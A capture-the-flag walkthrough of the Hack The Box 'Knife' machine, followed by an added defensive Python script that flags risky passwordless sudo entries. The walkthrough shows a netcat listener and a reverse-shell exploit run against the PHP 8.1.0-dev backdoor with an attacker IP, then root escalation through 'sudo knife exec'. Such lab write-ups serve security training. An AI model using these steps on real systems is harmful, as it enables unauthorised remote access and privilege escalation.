Knife – Hack the box

Knife

  • 10.10.10.242
  • knife.htb
  • Port: 22, 80

The target appears to run php 8.1.0-dev, so the following vulnerability can be used to obtain the user shell:
PHP 8.1.0-dev Backdoor Remote Command Injection
In addition, james is allowed to run Chef's knife via sudo, so `knife exec` can be used to run commands with root privileges.

$ autorecon 10.10.10.242

[*] Task tcp/22/nmap-ssh on 10.10.10.242 finished successfully in 6 seconds
[-] [10.10.10.242 tcp/80/nmap-http] Scanning 1 service on knife.htb (10.10.10.242)
[-] [10.10.10.242 tcp/80/nmap-http] Completed Service scan at 14:55, 6.32s elapsed (1 service on 1 host)
[-] [10.10.10.242 tcp/80/nmap-http] NSE: Script scanning 10.10.10.242.
[-] [10.10.10.242 tcp/80/nmap-http] NSE: Starting runlevel 1 (of 3) scan.
[-] [10.10.10.242 tcp/80/nmap-http] Initiating NSE at 14:55
[-] [10.10.10.242 tcp/80/whatweb] WhatWeb report for http://10.10.10.242:80
[-] [10.10.10.242 tcp/80/whatweb] Status    : 200 OK
[-] [10.10.10.242 tcp/80/whatweb] Title     : Emergent Medical Idea
[-] [10.10.10.242 tcp/80/whatweb] IP        : 10.10.10.242
[-] [10.10.10.242 tcp/80/whatweb] Country   : RESERVED, ZZ
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] Summary   : Apache[2.4.41], X-Powered-By[PHP/8.1.0-dev], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], HTML5, PHP[8.1.0-dev], Script
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] Detected Plugins:
[-] [10.10.10.242 tcp/80/whatweb] [ Apache ]
[-] [10.10.10.242 tcp/80/whatweb] 	The Apache HTTP Server Project is an effort to develop and
[-] [10.10.10.242 tcp/80/whatweb] 	maintain an open-source HTTP server for modern operating
[-] [10.10.10.242 tcp/80/whatweb] 	systems including UNIX and Windows NT. The goal of this
[-] [10.10.10.242 tcp/80/whatweb] 	project is to provide a secure, efficient and extensible
[-] [10.10.10.242 tcp/80/whatweb] 	server that provides HTTP services in sync with the current
[-] [10.10.10.242 tcp/80/whatweb] 	HTTP standards.
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] 	Version      : 2.4.41 (from HTTP Server Header)
[-] [10.10.10.242 tcp/80/whatweb] 	Google Dorks: (3)
[-] [10.10.10.242 tcp/80/whatweb] 	Website     : http://httpd.apache.org/
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] [ HTML5 ]
[-] [10.10.10.242 tcp/80/whatweb] 	HTML version 5, detected by the doctype declaration
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] [ HTTPServer ]
[-] [10.10.10.242 tcp/80/whatweb] 	HTTP server header string. This plugin also attempts to
[-] [10.10.10.242 tcp/80/whatweb] 	identify the operating system from the server header.
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] 	OS           : Ubuntu Linux
[-] [10.10.10.242 tcp/80/whatweb] 	String       : Apache/2.4.41 (Ubuntu) (from server string)
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] [ PHP ]
[-] [10.10.10.242 tcp/80/whatweb] 	PHP is a widely-used general-purpose scripting language
[-] [10.10.10.242 tcp/80/whatweb] 	that is especially suited for Web development and can be
[-] [10.10.10.242 tcp/80/whatweb] 	embedded into HTML. This plugin identifies PHP errors,
[-] [10.10.10.242 tcp/80/whatweb] 	modules and versions and extracts the local file path and
[-] [10.10.10.242 tcp/80/whatweb] 	username if present.
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] 	Version      : 8.1.0-dev
[-] [10.10.10.242 tcp/80/whatweb] 	Google Dorks: (2)
[-] [10.10.10.242 tcp/80/whatweb] 	Website     : http://www.php.net/
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] [ Script ]
[-] [10.10.10.242 tcp/80/whatweb] 	This plugin detects instances of script HTML elements and
[-] [10.10.10.242 tcp/80/whatweb] 	returns the script language/type.
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] [ X-Powered-By ]
[-] [10.10.10.242 tcp/80/whatweb] 	X-Powered-By HTTP header
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] 	String       : PHP/8.1.0-dev (from x-powered-by string)
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] HTTP Headers:
[-] [10.10.10.242 tcp/80/whatweb] 	HTTP/1.1 200 OK
[-] [10.10.10.242 tcp/80/whatweb] 	Date: Mon, 30 Aug 2021 05:55:36 GMT
[-] [10.10.10.242 tcp/80/whatweb] 	Server: Apache/2.4.41 (Ubuntu)
[-] [10.10.10.242 tcp/80/whatweb] 	X-Powered-By: PHP/8.1.0-dev
[-] [10.10.10.242 tcp/80/whatweb] 	Vary: Accept-Encoding
[-] [10.10.10.242 tcp/80/whatweb] 	Content-Encoding: gzip
[-] [10.10.10.242 tcp/80/whatweb] 	Content-Length: 2406
[-] [10.10.10.242 tcp/80/whatweb] 	Connection: close
[-] [10.10.10.242 tcp/80/whatweb] 	Content-Type: text/html; charset=UTF-8
[-] [10.10.10.242 tcp/80/whatweb] 

$ git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce && cd php-8.1.0-dev-backdoor-rce

# ----
# listen on the attacker machine
$ nc -lvp 11451
# ----

# usage: revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>
$ python3 revshell_php_8.1.0-dev.py http://10.10.10.242/ 10.10.xx.xx 11451

# ---
james@knife:/$ whoami
james

james@knife:/$ id
uid=1000(james) gid=1000(james) groups=1000(james)

james@knife:/$ ls /home/james
user.txt

james@knife:/$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

# https://docs.chef.io/workstation/knife_exec/
$ sudo knife exec

system('id')
uid=0(root) gid=0(root) groups=0(root)

# root.txt
system('cat \/root\/root.txt')
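Added example, not part of the writeup: a small defender-side audit that parses `sudo -l` output like the one above and flags passwordless root entries for binaries that can evaluate code (knife, via `knife exec`, is the case on this box). The list of such binaries is an assumption for the example.

```python
import re
from pathlib import PurePosixPath

# Constructed sample input: the `sudo -l` output quoted in the writeup.
SUDO_L_OUTPUT = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

# Binaries with a built-in code-evaluation or shell-escape path (knife has `knife exec`).
# Assumed list for this example, not an exhaustive catalogue.
CODE_EXEC_BINARIES = {"knife", "ruby", "python3", "perl", "bash", "sh", "vim", "less"}

# One command spec line: "(runas) TAG: TAG: cmd1, cmd2"
ENTRY_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return (runas, tags, command) tuples from the command section of `sudo -l`."""
    entries, in_commands = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run" in line:
            in_commands = True  # everything after this header is a command spec
            continue
        if not in_commands or not line:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            entries.append((m.group("runas").strip(), tags, cmd.strip()))
    return entries


def risky_entries(text):
    """Commands runnable as root without a password that point at a code-exec binary."""
    risky = []
    for runas, tags, cmd in parse_sudo_l(text):
        runs_as_root = runas.split(":")[0].strip() in ("root", "ALL")
        name = PurePosixPath(cmd.split()[0]).name
        if runs_as_root and "NOPASSWD" in tags and (cmd == "ALL" or name in CODE_EXEC_BINARIES):
            risky.append(cmd)
    return risky


if __name__ == "__main__":
    for cmd in risky_entries(SUDO_L_OUTPUT):
        print(f"[!] passwordless root via code-exec binary: {cmd}")
```

The same entry with a password requirement (no NOPASSWD tag) is not flagged, so the check singles out the combination that makes the box trivially rootable.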
